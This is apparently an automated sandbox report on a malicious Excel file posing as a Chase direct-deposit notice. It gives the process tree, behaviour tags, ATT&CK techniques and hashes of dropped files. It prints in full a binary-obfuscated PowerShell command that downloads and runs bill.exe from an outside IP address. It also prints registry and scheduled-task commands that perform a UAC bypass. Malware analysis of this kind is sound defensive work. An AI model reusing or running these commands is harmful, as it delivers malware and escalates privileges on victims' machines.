PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Chase Direct Deposit.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00111000,00101110,00110010,00110011,00101110,00110010,00110101,00110001,00101110,00110001,00110001,00110000,00101111,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00111011,01001001,01000101,01011000,00101000,00100100,01010100,01000011,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308

C:\Users\Admin\AppData\Local\Temp\bill.exe
"C:\Users\Admin\AppData\Local\Temp\bill.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1792

C:\Users\Admin\AppData\Local\Temp\bill.exe
C:\Users\Admin\AppData\Local\Temp\bill.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:740

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
5⤵
PID:2548

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hmjuwlqbsccgbmrblu.vbs"
6⤵
PID:3036

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\Trast.bat" "
5⤵
PID:2584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
6⤵
PID:2624

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
7⤵
- Modifies registry key
PID:2656

C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
7⤵
- Modifies registry key
PID:2668

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
7⤵
PID:2680

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\nest.bat" "
5⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
6⤵
- Modifies registry key
PID:1720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00111000,00101110,00110010,00110011,00101110,00110010,00110101,00110001,00101110,00110001,00110001,00110000,00101111,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00111011,01001001,01000101,01011000,00101000,00100100,01010100,01000011,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Users\Admin\AppData\Local\Temp\bill.exe
"C:\Users\Admin\AppData\Local\Temp\bill.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2704

C:\Users\Admin\AppData\Local\Temp\bill.exe
C:\Users\Admin\AppData\Local\Temp\bill.exe
4⤵
- Executes dropped EXE
PID:2772

C:\Windows\SysWOW64\mobsync.exe
C:\Windows\System32\mobsync.exe
5⤵
PID:2032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00111000,00101110,00110010,00110011,00101110,00110010,00110101,00110001,00101110,00110001,00110001,00110000,00101111,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00111011,01001001,01000101,01011000,00101000,00100100,01010100,01000011,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Users\Admin\AppData\Local\Temp\bill.exe
"C:\Users\Admin\AppData\Local\Temp\bill.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2464

C:\Users\Admin\AppData\Local\Temp\bill.exe
C:\Users\Admin\AppData\Local\Temp\bill.exe
4⤵
- Executes dropped EXE
PID:2556

C:\Windows\SysWOW64\mobsync.exe
C:\Windows\System32\mobsync.exe
5⤵
PID:1936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
MD5
5cf2e44b9e66998b6f5cc017e85ba787

SHA1
b827d5d4a72850dd66b464263c2e8851e51bdbe9

SHA256
5aa109b442942dda9ef44f64c3ec9eca8e3ee1908437d547c47bcd89a106bfc3

SHA512
c25a544adf155e3aa3ef801121a64d5fcda09cddd23dbf596392d5a2c0ae8f20182134545354143ef57cbbe1fd97ee0c033655fac5346c7bc431aa35c77871f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
MD5
142fe7ff1db6a8d6a9fe461bb2608db8

SHA1
100b284d14b0ffcea0e2be7f9498b01dd468d95a

SHA256
5e1be8de61d2a9d098e508b179b1a4a8a7a02e84841e5675698b96aace774066

SHA512
6cc5f2e3d3e93b6eb2024b34264e0526cb1a63f842081aa46935bf2ef905e75f56365990eac6b33384fc4c410da933763545c39a1cd2a0c6244281638bc7562e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
81963431983e3dcf21c7c5c2b5328f2a

SHA1
8505968410821d07587d62151ef021adf2b3b440

SHA256
357ff80e27e7c4fab078f03d345c9dd9f94524d5289f941771921a7130f9f8bf

SHA512
23494b0b75742034e33eb2fec66f55f103b5d6cefd4d975e7512cd79ea2454d385c75a2c6cd604c45db45673a313e0ba1e7f8bef545582ca99c98ab09a8a82b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
6f025e58ea228b1c195ad766d51061ce

SHA1
6800544e352eaa7075eed5ac2e40be0b29f5bd95

SHA256
4add9506842ab6855d9773af593d5ea951d20a5f714f2f3649e9949b7e8f7aba

SHA512
e17f36c8a532466ff17d9cb9ce3083cefb2edc5ddc06ff0f0371424d14f890631e68757b637bc997e4d318b67575042af4d29c504e6f4adf4bb5964178668c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\hmjuwlqbsccgbmrblu.vbs
MD5
20194639a471c85332924601e071aec4

SHA1
6a69ca7f78b34ca6a3959236237ef62de1cf09a2

SHA256
43dddf81fa819e8499eb4a24211a2702ee8a3fc04048d4a8e3b3f4f9420c68e8

SHA512
5616837814bf251f1d007cbaf8002aa66b91b199833437ca236507adaa40ece785264da6857445ab8ae958803453af67f631a0ec0cd1c931c7f3e763c24bc079

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\45EEEQEA.txt
MD5
21690554d0d41403e528677645bd91a7

SHA1
66a93537d4752bffed60e1a067eee4283b7ca329

SHA256
0375ebe190ad13ac751ecb3b6f3e3c75fc654312b1fb82a44eed2d66122ea3d3

SHA512
323f2ee9764c7efbdaf64119e7595fbf7e6d330a0e8d2b83b420aa56042f225cf31ca5bd297b3d0df31e4ea84e025125f243180d26665aeffe0ac24ebc0b097c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\DI4FFV1O.txt
MD5
7659e702627b1667720533a20d831306

SHA1
8467e639e5d4fc006bf2223530af2f50aa43aba8

SHA256
7bbe79c54f5f65a457de55a9169a810a8e38a0caa1a039df927b0f299989dd02

SHA512
0d7d8fd8f8c903df5c8d6e688bbd8ee8b3c437ea885e080b5efba083ae5a5ba2035c4187644b1fe9f3c3006ae2791548ae39135f9ab3613523560c35ba606d77

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
51f1b2c12b675e3511279a7c7827804a

SHA1
22fc45770c4546c6b0f0dfe201a537fc81c7d9a4

SHA256
dd681b498fdaed567c6be443cc1337d7227f2f0632d54c2bb9b8a59860646917

SHA512
c478e4bbb09cab4a4b346f9a5df1fd60dbd19721cb150a44f3a17bb05851c76c3854d9c7cbba887a953e6c01c8b4a7bd46d8ea4b2f158154a08946079e8f1001

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
51f1b2c12b675e3511279a7c7827804a

SHA1
22fc45770c4546c6b0f0dfe201a537fc81c7d9a4

SHA256
dd681b498fdaed567c6be443cc1337d7227f2f0632d54c2bb9b8a59860646917

SHA512
c478e4bbb09cab4a4b346f9a5df1fd60dbd19721cb150a44f3a17bb05851c76c3854d9c7cbba887a953e6c01c8b4a7bd46d8ea4b2f158154a08946079e8f1001

Download Submit
C:\Users\Public\Trast.bat
MD5
4068c9f69fcd8a171c67f81d4a952a54

SHA1
4d2536a8c28cdcc17465e20d6693fb9e8e713b36

SHA256
24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810

SHA512
a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

Download Submit
C:\Users\Public\UKO.bat
MD5
eaf8d967454c3bbddbf2e05a421411f8

SHA1
6170880409b24de75c2dc3d56a506fbff7f6622c

SHA256
f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56

SHA512
fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

Download Submit
C:\Users\Public\nest.bat
MD5
8ada51400b7915de2124baaf75e3414c

SHA1
1a7b9db12184ab7fd7fce1c383f9670a00adb081

SHA256
45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7

SHA512
9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
\Users\Admin\AppData\Local\Temp\bill.exe
MD5
27ee757d743631d49dcb3c6d7c90dfbe

SHA1
2b356d2090ea481e38fdf1e78dac05b74c4818f0

SHA256
dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028

SHA512
871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1

Download Submit
memory/740-106-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/740-99-0x0000000000000000-mapping.dmp

Download
memory/740-105-0x0000000000330000-0x0000000000331000-memory.dmp

Filesize
4KB

Download
memory/1308-80-0x0000000006490000-0x0000000006491000-memory.dmp

Filesize
4KB

Download
memory/1308-74-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/1308-64-0x0000000000000000-mapping.dmp

Download
memory/1308-65-0x0000000076641000-0x0000000076643000-memory.dmp

Filesize
8KB

Download
memory/1308-66-0x0000000002260000-0x0000000002261000-memory.dmp

Filesize
4KB

Download
